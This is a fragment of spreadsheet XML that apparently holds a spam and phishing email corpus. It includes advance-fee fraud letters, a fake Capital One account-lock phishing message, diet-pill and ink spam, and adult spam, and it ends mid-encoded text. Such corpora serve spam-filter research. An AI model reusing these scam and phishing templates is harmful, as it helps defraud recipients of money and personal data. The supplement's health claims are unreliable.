    <t>http://club.live.com</t>
  </si>
  <si>
    <t>1692</t>
  </si>
  <si>
    <t>To: nan\nFrom: More Frankline &lt;barristerfm2006@msn.com&gt;\nDate: Wed, 18 Jan 2006 13:54:56 +0000</t>
  </si>
  <si>
    <t>Wed, 18 Jan 2006 13:54:56 +0000</t>
  </si>
  <si>
    <t>More Frankline &lt;barristerfm2006@msn.com&gt;</t>
  </si>
  <si>
    <t>ASAP</t>
  </si>
  <si>
    <t>From: Barr. Barrister franklin More.\n29 Frith Street,\nLondon , W1D 5LG\nFax  44-87-1247-2267\ntel; 447031955738\nfrankmore@walla.com\nAttn Sir,\nI  am Barr.franklin More a solicitor and legal practitioner based in United \nKingdom. I am the personal attorney to Dr. George Brumley who was a\nconsultant with Shell UK LTD here in London, who shall be referred to as my \nclient. On the 21st of July 2003, my client Dr. George Brumley and his \nfamily were involved in a fatal plane crash in Nairobi Kenya, East Africa. \nUnfortunately my client Mr. George and his family lost their lives.\nHere is the website of the incident that struck on that faithful  aay \n[URL]http://www.cnn.com[/URL]\nSince then I have made several enquiries to locate any of my clients  \nextended relatives and this has proved unsuccessful. After my several\nunsuccessful attempts to locate any member of his family hence I contacted \nyou. I am contacting you to assist in repatriating the money left behind by \nmy client before they get confiscated or declared unclaimed by the security \ncompany where this huge deposit were lodged.\nParticularly, the finance company where the deceased had the said fund \nvalued at USD20 million dollars has issued me a notice to provide the\nnext of kin. Since I have been unsuccessful in locating the relatives for \nover 3 years, I seek your consent to present you as the next of kin to the \ndeceased, so that the proceeds of this account valued at $20 Million Dollars \ncan be paid to your account abroad, you will have 30% of the money for your \nrole while I will have 60% and 10% for expenses that we may incure in the \ncause of processing the claim.\nI have access to all necessary legal documents that can be used to back up \nany claim we may make. All I require is your honest co-operation to\nenable us seeing this deal through. I guarantee that this will be executed \nunder a legitimate arrangement that will protect you from any breach of the \nlaw. Please kindly get back to me through my email address or personal \nphone- frankmore@walla.com\nnumber for confidentiality and send to me your telephone and fax numbers to \nenable us discuss further about this transaction.\nBest regards\nFranklin  More\n\n\n\n\n</t>
  </si>
  <si>
    <t>1693</t>
  </si>
  <si>
    <t>To: ai-all@eecs.UM\nFrom: Capital One &lt;abuse@capitalone.com&gt;\nDate: Wed, 18 Jan 2006 08:13:27 -0500</t>
  </si>
  <si>
    <t>Wed, 18 Jan 2006 08:13:27 -0500</t>
  </si>
  <si>
    <t>Capital One &lt;abuse@capitalone.com&gt;</t>
  </si>
  <si>
    <t>ai-all@eecs.UM</t>
  </si>
  <si>
    <t>Unlock Your Account</t>
  </si>
  <si>
    <t>For your security, the profile that you are using to access Capital  One Online Banking has been locked because of too many failed login attempts. You can unlock this  profile online by selecting an option below: Unlock your Capital One profile with:          [URL]https://service.capitalone.com[/URL]          We regret any inconvenience this may cause you. Sincerely, Capital One Account Review Department. We are requesting this information to verify and protect your identity. This is  in order to prevent the use of the U.S. banking system in terrorist and other illegal activity. Need help? Use "Site Helper"  or call customer service at 1.800- Capital  One. Please do not "Reply" to this Alert.  2005 Capital  One, N.A. All rights reserved.</t>
  </si>
  <si>
    <t>https://service.capitalone.com</t>
  </si>
  <si>
    <t>597</t>
  </si>
  <si>
    <t>To: R@M\nFrom: arapmoi.gideon@caramail.com\nDate: Wed, 18 Feb 2004 16:31:05 +0100</t>
  </si>
  <si>
    <t>Wed, 18 Feb 2004 16:31:05 +0100</t>
  </si>
  <si>
    <t>arapmoi.gideon@caramail.com</t>
  </si>
  <si>
    <t>CONFIDENTIAL MATTER</t>
  </si>
  <si>
    <t>Goodday,\n \nI am Gideon Arap Moi, the son of The former president of Kenya\n \nMr Daniel Arap Moi. I came to know you in the course of my\n \nsearch for a reliable And GOD fearing partner, and I decided to contact\nyou\n \nBecause I believe you are a reputable person and I feel You can help me\n \nand my mother over this confidential matter.\n \nI count on your integrity and honesty to be able to handle this\n \nBusiness. My father, Mr Arap Moi, was the former president of Kenya ,\n \nIn East Africa, During his reign as the president , he had so many\n \nMonetary dealing with a lot of European companies in my country\n \nAnd out side my country, and he uses these companies as a means\n \nOf transferring funds to foreign accounts in Europe ,America and\n \nAsia., all these funds where gotten from the sales of Gold and Diamonds,\n \nAmongst the companies he registered was GOLDENBERG COMPANY,\n \nWhich he uses as front for funds deposit, he made a transfer of $76,000,000.\n \n(seventy six million American Dollars) to this company which never existed,\n \nthe said company has since been declared bankruptcy and liquidate, and\nthe\n \nsaid funds has been deposited with a security company in Europe where it\n \n  is kept from for safekeeping.\n \nFor more information you can click on this website:\n \n(1) [URL]http://news.bbc.co.uk[/URL]\nor ,\n \n(2) [URL]http://news.bbc.co.uk[/URL]\n \nAnd as the only child of my mother who is the 6th wife to my father\n \nthe president, he has given to us as our own share, which is this funds\n \nthat is with the security company in Europe. The money is kept in\n \ntrunk boxes and was registered as precious substances, thus there is\n \nnobody that knows that it is money that is in the box. All the documents\n \nwith which the money was deposited is with us (my mother and I) I am\n \nlooking for somebody that is capable and willing to travel to any part\nof\n \nEurope to receive the two trunk boxes of money on behalf of my mother\n \nand I from the security company.\n \nWe need a trust worthy and experience person that will help us to invest\n \nThis money in your country and take us as one family and will also buy\nA house for us over there where we can live safely\n \nWe are expecting to hear from you, please contact me on my\n \nConfidential email address: gideonarapmoi@latinmail.com\n \nThanks for your anticipated co-operation , please include your\n \nTelephone number and fax number in your reply.\n \nBest Regards\n \nGideon Arap Moi\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>861</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr Moni Millat &lt;monimillat@gawab.com&gt;\nDate: Wed, 18 Aug 2004 15:40:43 +0100</t>
  </si>
  <si>
    <t>Wed, 18 Aug 2004 15:40:43 +0100</t>
  </si>
  <si>
    <t>Mr Moni Millat &lt;monimillat@gawab.com&gt;</t>
  </si>
  <si>
    <t>I will be glad to hear from you.</t>
  </si>
  <si>
    <t>ATTN.DEAR,\n\nMy name is Mr Moni Millat  a member of Independent Committee of \nEminent Persons (ICEP), Switzerland. ICEP is charged with the responsibility \nof finding bank accounts in Switzerland belonging to non-Swiss \nindigenes, which have remained dormant since World War II.\nIt may interest you to know that in July of 1997, the Swiss Banker's \nAssociation published a list of dormant accounts originally opened by \nnon-Swiss citizens. These accounts had been dormant since the end of World \nWar II (May 9, 1945). Most belonged to Holocaust victims.\nThe continuing efforts of the Independent Committee of Eminent Persons \n(ICEP) have since resulted in the discovery of additional dormant \naccounts - 54,000 in December, 1999.\nThe published lists contain all types of dormant accounts, including \ninterest-bearing savings accounts, securities accounts, safe deposit \nboxes, custody accounts, and non-interest-bearing transaction accounts. \nNumbered accounts are also included. Interest is paid on accounts that \nwere interest bearing when established.\nThe Claims Resolution Tribunal (CRT) handles processing of all claims \non accounts due non-Swiss citizens. A dormant account of ORDNER ADELE \nwith a credit balance of 45,000,000 US dollar plus  accumulated interest \nwas discovered by me. The beneficiary was murdered during the holocaust \nera, leaving no WILL and no possible records for trace of heirs. \nThe Claims Resolution Tribunal has been mandated to report all \nunclaimed funds for permanent closure of accounts and transfer of existing \ncredit balance into the treasury of Switzerland government as provided by \nthe law for management of assets of deceased beneficiaries who died \ninterstate (living no wills).\nBeing a top executive at ICEP, I have all secret details and necessary \ncontacts for claim of the funds without any hitch. The funds will be \nbanked in the Holland Or London, being a safe haven for funds and \nwe can share the funds and use in investment of our choice.\nDue to the sensitive nature of my job, I need a foreigner to HELP claim \nthe funds. All that is required is for you to provide me with your \ndetails for processing of the necessary legal and administrative claim \ndocuments for transfer of the funds to you.\nKindly provide me with your full name, address, and telephone/fax. I \nwill pay all required fees to ensure that the fund is transferred to a \nsecure, numbered account in your name in the Holland Or London, of which you \nwill be capable of accessing the funds gradually and transferring to \nyour country and other banks of choice in the world. My share will be 60 \npercent and your share is 40 per cent of the total amount. THERE IS NO \nRISK INVOLVED.\nYou can find additional information about unclaimed funds through the \ninternet at the following websites:\n[URL]www.swissbankclaims.com[/URL]\n[URL]http://www.cnn.com[/URL]\n\n[URL]www.avotaynu.com[/URL]\n[URL]www.icheic.org[/URL]\n[URL]www.livingheirs.com[/URL]\n[URL]www.wiesenthal.com[/URL]\n\nThe Holocaust Claims Processing Office has put funds in Escrow awaiting \nsubmission of valid claims for necessary disbursement.\nI find myself priviledged to have this information and this may be a \ngreat opportunity for a life time of success without risks.\nDue to security reasons, reply to my via email only. You may reply to \nme securely on the following email,\nmonimillat@myway.com\n \nThank you for your prompt response.\nMr Moni Millat\n\n\n\n</t>
  </si>
  <si>
    <t>www.swissbankclaims.com http://www.cnn.com www.avotaynu.com www.icheic.org www.livingheirs.com www.wiesenthal.com</t>
  </si>
  <si>
    <t>5217</t>
  </si>
  <si>
    <t>To: &lt;anmartinet@hotmail.com&gt;, &lt;mtj37@aol.com&gt;, &lt;kkosal@hotmail.com&gt;,\nFrom: davidk348@gateway.net\nDate: Wed, 17 Jul 2002 23:50:01 -1600</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 23:50:01 -1600</t>
  </si>
  <si>
    <t>davidk348@gateway.net</t>
  </si>
  <si>
    <t>&lt;anmartinet@hotmail.com&gt;, &lt;mtj37@aol.com&gt;, &lt;kkosal@hotmail.com&gt;,</t>
  </si>
  <si>
    <t>Lose 11 Pounds In 7 Days                   IML</t>
  </si>
  <si>
    <t>Long time no chat!\n\nHow have you been? If you've been like me, you've been trying\ntrying almost EVERYTHING to lose weight. I know how you feel\n- the special diets, miracle pills, and fancy exercise \nequipment never helped me lose the pounds I needed to lose\neither. It seemed like the harder I worked at it, the less\nweight I lost - until I heard about 'Extreme Power Plus'.\n\nYou're probably thinking to yourself, "Oh geez, not another\nmiracle diet pill!" Like you, I was skeptical at first, but \nmy sister said it helped her lose 23 pounds in just 2 weeks, \nso I told her I'd give it a try. I mean, there was nothing \nto lose except a lot of weight! Let me tell you, it was\nthe best decision I've ever made.  PERIOD.  Six months later,\nas I'm writing this message to you, I've gone from 355 pounds\nto 210 pounds, and I haven't changed my exercise routine or diet\nat all. Yes, I still eat pizza, and lots of it!\n\nI was so happy with the results that I contacted the manufacturer\nand received permission to resell it - at a HUGE discount.I feel\nthe need to help other people lose weight like I did, because it\ndoes so much for your self-esteem, not to mention your health.\nI am giving you my personal pledge that 'Extreme Power Plus'\nabsolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!\n\nIf you are frustrated with trying other products, without having \nany success, and just not getting the results you were promised,\nthen I recommend the only product that worked for me - \n'EXTREME POWER PLUS'!\n\nYou're probably asking yourself, "Ok, so how does this stuff\nactually work?"\n\nExtreme Power Plus contains Lipotropic fat burners and ephedra which \nis scientifically proven to increase metabolism and cause rapid \nweight loss. No "hocus pocus" in these pills - just RESULTS!!! \n\nHere is the bottom line ...\n\nI can help you lose 10-15 pounds per week naturally, without\nexercising and without having to eat rice cakes all day. \nJust try it for one month - there's pounds to lose and confidence \nto gain! You will lose weight fast - GUARANTEED. This is my\npledge to you.\n\nBONUS! Order now and get FREE SHIPPING on 3 bottles or more! \n\nTo order Extreme Power Plus on our secure server, just click\non this link -&gt; [URL]http://www.2002dietspecials.com[/URL]\n\nTo see what some of our customers have said about this product, \nvisit [URL]http://www.2002dietspecials.com[/URL]\n\nTo see a list of ingredients and for more information\non test studies and how it will help you lose weight, visit \n[URL]http://www.2002dietspecials.com[/URL]\n\n**************************************************************\nIf you feel that you have received this email in error, please \nsend an email to "print2@btamail.net.cn" requesting to be \nremoved. Thank you, and we apologize for any inconvenience.\n**************************************************************\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.2002dietspecials.com http://www.2002dietspecials.com http://www.2002dietspecials.com http://xent.com</t>
  </si>
  <si>
    <t>5212</t>
  </si>
  <si>
    <t>To: &lt;abehli@msn.com&gt;, &lt;wolfcub@industrialac.com&gt;,\nFrom: d_akh@hotmail.com\nDate: Wed, 17 Jul 2002 20:28:03 -1600</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 20:28:03 -1600</t>
  </si>
  <si>
    <t>d_akh@hotmail.com</t>
  </si>
  <si>
    <t>&lt;abehli@msn.com&gt;, &lt;wolfcub@industrialac.com&gt;,</t>
  </si>
  <si>
    <t>Re: Got Ink?              21846</t>
  </si>
  <si>
    <t>What have you been up to?\nI don't know about you, but I am sick and tired of going\ndown to the store to find out that your printer cartridges\ncost more than the printer itself! I know how you feel\n- I print over 500 pages a day, and it feels like there is\na vacuum sucking money out of my wallet! Now, this has got\nto stop because I know it doesn't cost the printer companies\nanywhere near what it costs me to do my office and school work!\nWell, it finally has.  The SUPERINK solution.\n\nYou're probably thinking to yourself, "Gosh darn, not another\ncheap knockoff printer cartridge!" Like you, I was very \nskeptical at first, but my best friend &amp; business associate\nsaid it helped her save over $100 a month on printer supplies. \nSo I tried it. I mean, there was nothing to lose because they\noffer a 100% satisfaction guarantee, up to a one-year warranty\non all of their products and FREE Shipping on ALL orders!\nLet me tell you, it was one of the best decisions I've ever made.\nPeriod. Six months later, as I'm writing this message to you,\nI've gone from spending $1000 dollars a month on printer supplies\nto Now ONLY $475! and I haven't had to sacrifice the quality or\nservice that I received from the local office supply store. In fact,\nthe service is even BETTER!  I've had 1 defective cartridge since \nI started dealing with SUPERINK and they sent me a new replacement\nwithin 3 days, no questions asked. Now, I can print all I want!\n\nI was so happy with the results that I contacted their manufacturer\nand got permission to be a reseller - at a BIG discount. I want\nto help other people to avoid getting jipped by the printer companies\nlike I did. Because a penny saved is a penny earned! \nI give you my personal pledge the SUPERINK soltuion will absolutely\nWORK FOR YOU. If it doesn't, you can return your order anytime\nfor a full refund.  \n\nIf you are frustrated with dishing out money like it is water to the\nprinter companies, or tired of poor quality ink &amp; toner cartridges,\nthen I recommend - the SUPERINK solution.\n\nYou're probably asking yourself, "Ok, so how do we save all this money\nwithout losing quality and service?"\n\nModern technology has provided SUPERINK with unique, revolutionary\nmethods of wax molding that allow the ink &amp; toner to 'settle', which\nprevents any substantial damage that would occur during shipping and\nhandling. Nothing "magic" about it - just quality &amp; savings, BIG SAVINGS!\n\nHere is the bottom line ...\n\nI can help you save 30%-70% per week/per month/per year or per lifetime \nby purchasing any of our ink &amp; toner supplies. Just try it once, you'll \nkeep coming back - there's nothing to lose, and much MONEY to be saved! \n100% Satisfaction Guaranteed. You will be able to print as much as you\nwant without wasting money or sacrificing quality - GUARANTEED.\nThat is my pledge to you. \n\nTo order from the SUPERINK Solution on our secure server, just click\non the link below (or enter it into your browser):\n\n[URL]http://www.superink.net[/URL]\n\nIf you have difficulty accessing the website above, please\ntry contacting us toll-free at 1-800-758-8084 - Thanks!\n\nSincerely - Bruce Tipton\n\n\n******************************************************************\nIf you do not wish to receive any more emails from me, please \nsend an email to "print2@btamail.net.cn" requesting to be removed.\nThank You and Sorry for any inconvenience.\n******************************************************************</t>
  </si>
  <si>
    <t>http://www.superink.net</t>
  </si>
  <si>
    <t>5200</t>
  </si>
  <si>
    <t>To: webmake-talk@example.sourceforge.net\nFrom: "joe" &lt;jcecil39@yahoo.com&gt;\nDate: Wed, 17 Jul 2002 19:53:53 -0400</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 19:53:53 -0400</t>
  </si>
  <si>
    <t>"joe" &lt;jcecil39@yahoo.com&gt;</t>
  </si>
  <si>
    <t>[WM] HOT BUISNESS OPPORTUNITY WANT TO MAKE MONEY?</t>
  </si>
  <si>
    <t>WANT TO MAKE MONEY?\n \n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n \nHOT BUSINESS OPPERTUNITY AVAILABLE\nfOR THOSE WHO QUALIFY...\n \n1.  MUST BE A UNITED STATES RESIDENT\n \n2.  MUST BE 21 YEARS OF AGE OR OVER.\n \nYOU WILL SHARE IN DIALYSIS CENTERS OF AMERICA\nLATEST CASH INCOME STREAM.\n \nEARN OVER 30% RETURN ON YOUR MONEY!\nINTEREST PAID ANNUALLY!\nCOMPLETELY LEGAL.\n \nTO FIND OUT ALL THE HOW'S AND WHY'S,\nREPLY TODAY WITH YOUR NAME, STATE AND COMPLETE PHONE \nNUMBER.  DETAILS WILL SOON FOLLOW!\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nwebmake-talk mailing list\nwebmake-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>5199</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - Life Pros" &lt;lp@insurancemail.net&gt;\nDate: Wed, 17 Jul 2002 19:19:22 -0400</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 19:19:22 -0400</t>
  </si>
  <si>
    <t>"IQ - Life Pros" &lt;lp@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C22DB1.C4B80210 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Non-Med Level Term 15-20 &amp; 30 year with Return of Premium Rider!	  It's Lucrative:	  	 Commission so high we can't publish them 	 Annualization Available 	 Daily Commission by EFT 	  It's Fast:	  	 Qualifying policies processed in 4 days or company pays you $100.00 	 Forms and Status from Internet 	  It's Easy:	  	 Non-medical underwriting (No Blood, No HOS, No Exam)* 	  	 Ages 0-60	 $100,000	   	 Ages 61-70	 $50,000	   	 Easy To Complete Application 	 Fax Application to Home Office (No Need to Mail Original) 	  888-574-9088	 Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	  	  	 	   	    	 M14070PBL602 *Issuance of the policy based on answers to medical questions We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal Notice    ------=_NextPart_000_0007_01C22DB1.C4B80210 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Commissions Too High to Publish =20    =20              =20              =20                               Commission so high we can't publish them =20                              Annualization Available  =20                              Daily Commission by EFT                =20              =20                               Qualifying policies processed in 4 days or company pays = you $100.00                =20                              Forms and Status from Internet                =20              =20                               Non-medical underwriting (No Blood, No HOS, No = Exam)* =20               Ages 0-60 $100,000 =20               Ages 61-70 $50,000 =20                               Easy To Complete Application =20                              Fax Application to Home Office (No Need to Mail = Original) =20              =20             =20                =20                    =20                        =20                           Please fill out the form below for more = information =20                           Name: =20                              =20                           E-mail: =20                              =20                           Phone: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20              =20             =20               M14070PBL602 =20             =20                 *Issuance=20                   of the policy based on answers to medical = questions                   We don't want anybody to receive our mailing who does = not wish=20                   to receive them. This is a professional communication = sent to=20                   insurance professionals. To be removed from this = mailing list,=20                   DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal = Notice=20                  ------=_NextPart_000_0007_01C22DB1.C4B80210--</t>
  </si>
  <si>
    <t>5194</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "DAVE   FRAMO" &lt;daveframo@writeme.com&gt;\nDate: Wed, 17 Jul 2002 19:09:57</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 19:09:57</t>
  </si>
  <si>
    <t>"DAVE   FRAMO" &lt;daveframo@writeme.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] DEAL</t>
  </si>
  <si>
    <t>SUBJECT: \n                   Urgent Concern Pls.\n\nI am a serious officer with one of our main branches of CITI BANK,\nconsumer Banking Department. Although we didn't have previous correspondence till date.\nHowever, based on the standard value place on everything about you,  I believed we could discuss, analyze and execute this transaction.The transaction is thus:\nI've a wealthy client, an American Citizen who had been residing in West Africa for decades now, he operates a fix deposit account with us which I am his account officer, and also \nreceives standing orders  for his chains of dividends share.\nHowever, this client Mr. David Brown died as an  out come of Heart attack,and the funds in his current account has  been claimed by his family, who had gone back finally to USA.\nAt the end of Fiscal year, March 2001, an  accumulated share of US$12.360M was transferred into his account from the Stock Exchange.\nThis was alone the instructions we issued to the Stock House to dispose all his stocks.\n\nNow the funds has arrived, I needed an associate whom I would present as the inheritor of this fund i.e. Associate partner of Mr. David Brown so as to receive this fund.\nPlease note, his family has left since,and never  know about this stocks in the exchange and the funds has subsequently matured in his Fix Deposit Account, so I as the account officer \nhas prepared all documents for easy claims of this fund.\nImmediately, you reach me, I will furnish you  with further details and then negotiate on the sharing ratio once you show your sincere involvement to go along with me. It will be of \nneed for you to furnish me also your personal phone and fax  numbers for urgent\nmessages. \nI am anxiously waiting to hear your consent. \n\nBe guided.\n\nThanking you .Yours sincerely,\n\nDave Framo.\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>5201</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: DVD Services &lt;hc@TomGreen.com&gt;\nDate: Wed, 17 Jul 2002 18:56:15 -0700</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 18:56:15 -0700</t>
  </si>
  <si>
    <t>DVD Services &lt;hc@TomGreen.com&gt;</t>
  </si>
  <si>
    <t>Free Adult DVDs. No purchase necessary... To: yyyy@netnoteinc.com ID: bju</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com ############################################ #                                          # #       Adult Online Super Store           # #              Shhhhhh...                  # #     You just found the Internet's        # #          BEST KEPT SECRET!!!             # #    3 Vivid DVDs Absolutely FREE!!!       # #                                          # ############################################ If you haven't seen it yet... we are offering a new weekly selection absolutely FREE Adult DVDs AND VIDEOS NO PURCHASE NECESSARY!!!!!  GO TO: [URL]http://209.203.162.20[/URL] Everything must go!!! Additional Titles as low as $6.97 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; ############################################ #                                          # #  Don't forget to forward this email to   # #  all your friends for the same deal...   # #  There is a new free DVD and VHS video   # #  available every week for your viewing   # #  pleasure.                               # #                                          # ############################################ Removal Instructions: You have received this advertisement because you have opted in to receive  free adult internet offers and specials through our affiliated websites. If  you do not wish to receive further emails or have received the email in  error you may opt-out of our database here [URL]http://209.203.162.20[/URL]  . Please allow 24 hours for removal. This e-mail is sent in compliance with the Information Exchange Promotion  and Privacy Protection Act. section 50 marked as 'Advertisement' with valid  'removal' instruction. kpjxxyrsjsnapbhilmbgsnenma</t>
  </si>
  <si>
    <t>http://209.203.162.20 http://209.203.162.20</t>
  </si>
  <si>
    <t>5192</t>
  </si>
  <si>
    <t>To: ccdrive@freeuk.com, ccdrive@yahoo.com, ccdriver3@yahoo.com,\nFrom: ebay_user1029@ebay.com ()\nDate: Wed, 17 Jul 2002 17:21:26 GMT</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 17:21:26 GMT</t>
  </si>
  <si>
    <t>ebay_user1029@ebay.com ()</t>
  </si>
  <si>
    <t>ccdrive@freeuk.com, ccdrive@yahoo.com, ccdriver3@yahoo.com,</t>
  </si>
  <si>
    <t>[SA] [Ginger] has sent you a webcam invitation!</t>
  </si>
  <si>
    <t>Dear Dr. Schaefer:\n\nI would greatly appreciate a reprint of your article entitled\n\n\n\nwhich appeared in \n\n\n\nSincerely Yours,\n \n\nmessage: this girls pussy is so wet...she squirts!![URL]http://webcamzz.dr.aggo[/URL] here to watch her webcam!her name is Ginger\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-Sightings mailing list\nSpamassassin-Sightings@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://webcamzz.dr.aggo http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5195</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: Videos&amp;DVDs &lt;tn@Pitching.com&gt;\nDate: Wed, 17 Jul 2002 12:15:13 -0700</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 12:15:13 -0700</t>
  </si>
  <si>
    <t>Videos&amp;DVDs &lt;tn@Pitching.com&gt;</t>
  </si>
  <si>
    <t>Free Adult Videos To: yyyy@netnoteinc.com ID: vtyp</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com ############################################ #                                          # #       Adult Online Super Store           # #              Shhhhhh...                  # #     You just found the Internet's        # #          BEST KEPT SECRET!!!             # #    3 Vivid DVDs Absolutely FREE!!!       # #                                          # ############################################ If you haven't seen it yet... we are offering a new weekly selection absolutely FREE Adult DVDs AND VIDEOS NO PURCHASE NECESSARY!!!!!  GO TO: [URL]http://209.203.162.20[/URL] Everything must go!!! Additional Titles as low as $6.97 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; ############################################ #                                          # #  Don't forget to forward this email to   # #  all your friends for the same deal...   # #  There is a new free DVD and VHS video   # #  available every week for your viewing   # #  pleasure.                               # #                                          # ############################################ Removal Instructions: You have received this advertisement because you have opted in to receive  free adult internet offers and specials through our affiliated websites. If  you do not wish to receive further emails or have received the email in  error you may opt-out of our database here [URL]http://209.203.162.20[/URL]  . Please allow 24 hours for removal. This e-mail is sent in compliance with the Information Exchange Promotion  and Privacy Protection Act. section 50 marked as 'Advertisement' with valid  'removal' instruction. axnaefpgdoyeffbpbfq</t>
  </si>
  <si>
    <t>5193</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: wjjzzs@wjjzzs.com\nDate: Wed, 17 Jul 2002 12:04:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 12:04:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>wjjzzs@wjjzzs.com</t>
  </si>
  <si>
    <t>Are you a sanitary ware distributor?</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format.\n\n--Z_MULTI_PART_MAIL_BOUNDAEY_S\nContent-Type: text/plain\nContent-Transfer-Encoding: base64\n\nTm90ZTpJZiB0aGlzIGVhbWlsIGlzIG5vdCBmaXQgZm9yIHlvdSxwbGVhc2UgcmVwbHkgdG8g\nd2VibWFzdGVyQHdqanp6cy5jb20gd2l0aA0KInJlbW92ZSIuDQpXZSBkb24ndCBpbnRlbmQg\ndG8gc2VuZCBzcGFtIGVtYWlsIHRvIHlvdS5UaGFuayB5b3UhDQoNCkRlYXIgc2lycyBvciBN\nYWRhbXMsDQpXZSBhcmUgb25lIEFyY3lsIGJhdGh0dWIgbWFudWZhY3R1cmVyIGluIENoaW5h\nLg0KDQotLS0tLS0tLS0tLS0tLS0tLVByb2ZpbGUtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0K\nDQpPdXIgZmFjdG9yeXNwZWNpYWxpemVzIGluIG1hbnVmYWN0dXJpbmcgobBZRU1BobEgYnJh\nbmQgYWNyeWxpYyBjb21wb3NpdGUgYmF0aHR1YnMsDQp3ZSBoYXZlIG1vcmUgdGhhbiAxMCB5\nZWFycyBleHBlcmllbmNlIG9mIGJhdGh0dWIgbWFudWZhY3R1cmluZyBhbmQgbWFya2V0aW5n\nLg0KV2l0aCBvdXIgY29uc2lkZXJhYmxlIGV4cGVyaWVuY2Ugd2Ugc2V0IG91dCB0byBibGVu\nZCB0aGUgYWR2YW50YWdlcyBvZiBhbGwgdGhlIG90aGVyDQpvZiBiYXRodHVicyBvZmZlcmVk\nIGluIHRoZSBtYXJrZXQgcGxhY2UgaW50byBvbmUgcmFuZ2UuIEFmdGVyIHNldmVyYWwgeWVh\ncnMgZGV2ZWxvcG1lbnQNCndlIHByb2R1Y2VkIG91ciBjdXJyZW50IHJhbmdlIGFuZCB0aGUg\nWUVNQSBicmFuZCBiYXRodHViIHdhcyBwYXRlbnRlZCBpbiAyMDAxLiBXZSB3ZXJlDQpldmVu\nIGF3YXJkZWQgdGhlICJHb2xkIE1lZGFsIiBpbiB0aGUgIkNoaW5lc2UgUGF0ZW50IFRlY2hu\nb2xvZ3kgRXhoaWJpdGlvbiIgYW5kDQoiVGhlIE5pbnRoIENoaW5lc2UgTmV3IFBhdGVudCBU\nZWNobm9sb2d5IGFuZCBOZXcgUGF0ZW50IFByb2R1Y3QgRXhoaWJpdGlvbiIgbGF0ZXIgdGhh\ndCB5ZWFyLg0KVGhlIFlFTUEgYmF0aHR1YnMgc3RydWN0dXJhbCBkZXNpZ24gaXMgdGhhdCBv\nZiBhIG5vcm1hbCBhY3J5bGljIGJhdGh0dWIgYnV0IGNvbmdsdXRpbmF0ZWQNCmludG8gYSBj\nb21wb3NpdGUgbWF0ZXJpYWwuIEl0IGlzIHJpZGdlZCBhbmQgaXMgbWFkZSBtb3JlIHRoYW4g\ndHdpY2UgYXMgdGhpY2sgYXMgYSBub3JtYWwNCnVuaXQsIG1ha2luZyBpdCBtb3JlIHNtb290\naCwgZ2VudGxlIGFuZCBlbGVnYW50LiBUaGlzIG1hbnVmYWN0dXJpbmcgdGVjaG5pcXVlIG5v\ndCBvbmx5DQpwcm92aWRlcyBhbGwgdGhlIGFkdmFudGFnZXMgb2YgYSBub3JtYWwgYWNyeWxp\nYyBiYXRodHViIChlYXNpbHkgdG8gY2xlYW4sIHJlc2lzdGFuY2UgdG8NCmRpcnQsIGNvbG9y\nZnVsLGF0dHJhY3RpdmUgZXRjKSBidXQgYWxzbyBwcm92aWRlcyBpbmNyZWFzZWQgaGVhdCBy\n